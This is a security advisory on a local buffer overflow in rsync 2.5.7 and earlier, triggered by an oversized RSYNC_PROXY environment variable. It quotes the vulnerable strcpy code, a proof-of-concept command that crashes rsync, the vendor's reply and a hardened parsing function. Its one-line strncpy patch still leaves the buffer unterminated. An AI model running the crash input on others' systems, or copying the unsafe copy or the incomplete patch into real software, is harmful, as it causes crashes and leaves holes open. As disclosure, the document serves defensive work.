"rsync is an open source utility that provides fast incremental file transfer. rsync is freely available under the GNU General Public License version 2". A local buffer overflow exists in rsync: a malicious user can export an overly long "RSYNC_PROXY" environment variable and crash rsync.
Credit:
The information has been provided by DownBload.
Vulnerable Systems:
* rsync version 2.5.7 and prior
Immune Systems:
* rsync version 2.6.1 (will be released in the next month or two)
The problem is in the open_socket_out function (socket.c). An attacker can overflow the portbuf[10] buffer on the stack and overwrite the saved return address. rsync is not installed suid, so a local user cannot use this to escalate privileges to root.
Vulnerable code:
- socket.c
...
    char portbuf[10];
    char *h;
    int proxied = 0;
    char buffer[1024];
    char *cp;

    h = getenv("RSYNC_PROXY");
    proxied = (h != NULL) && (*h != '\0');

    if (proxied) {
        strlcpy(buffer, h, sizeof(buffer));
        cp = strchr(buffer, ':');
        if (cp == NULL) {
            rprintf(FERROR,
                    "invalid proxy specification: should be HOST:PORT\n");
            return -1;
        }
        *cp++ = '\0';
        strcpy(portbuf, cp); // <- OVERFLOW
...
Patch:
Replace the vulnerable line with: strncpy(portbuf, cp, 10);
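A bounded version of that parsing block, added here as an example and not rsync's own code (the function name, buffer sizes and port range check are assumptions): it refuses a port field that would not fit in portbuf instead of copying it, and it terminates the buffer explicitly, which a bare strncpy(portbuf, cp, 10) does not guarantee when the field is 10 or more characters long.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical hardened version of the proxy-parsing block in
 * open_socket_out() (not rsync's own fix). Every copy is bounded by the
 * destination size and a port field that would not fit in portbuf is
 * rejected, so an oversized RSYNC_PROXY can never write past the stack
 * buffers. */

/* Split "HOST:PORT" in spec into host and portbuf.
 * Returns 0 on success, -1 on malformed or oversized input.
 * Nothing is written past the end of either buffer. */
int parse_proxy_spec(const char *spec, char *host, size_t hostlen,
                     char *portbuf, size_t portlen)
{
    const char *colon;
    size_t hlen, plen;
    char *end;
    long port;

    if (spec == NULL || hostlen == 0 || portlen == 0)
        return -1;
    colon = strchr(spec, ':');
    if (colon == NULL || colon == spec)
        return -1;               /* need a non-empty HOST before ':' */

    hlen = (size_t)(colon - spec);
    plen = strlen(colon + 1);
    /* Keep one byte in each buffer for the terminating NUL; this is the
     * check strcpy(portbuf, cp) lacked. Note strncpy(portbuf, cp, 10)
     * would leave portbuf unterminated when the field is 10+ chars. */
    if (hlen >= hostlen || plen == 0 || plen >= portlen)
        return -1;

    memcpy(host, spec, hlen);
    host[hlen] = '\0';
    memcpy(portbuf, colon + 1, plen);
    portbuf[plen] = '\0';

    /* The port must be a decimal number in 1..65535. */
    errno = 0;
    port = strtol(portbuf, &end, 10);
    if (errno != 0 || *end != '\0' || port < 1 || port > 65535)
        return -1;
    return 0;
}
```

The caller would pass getenv("RSYNC_PROXY") as spec with the same 1024-byte host buffer and 10-byte portbuf as the original code, and treat -1 as the "invalid proxy specification" error.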
PoC:
# export RSYNC_PROXY=`perl -e 'print "A" x100,":","A" x 1000'`
# rsync localhost::rsync: getaddrinfo:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: ai_family not supported
Segmentation fault
[root@localhost rsync-2.5.7]#
Vendor response:
"Correct. I fixed this in the CVS version earlier this year. Since the proxy data is coming from the local environment, I don't see a need to roll out an update to 2.6.0 (which is the latest released version, BTW). The fix will be in 2.6.1, which should be released in the next month or two."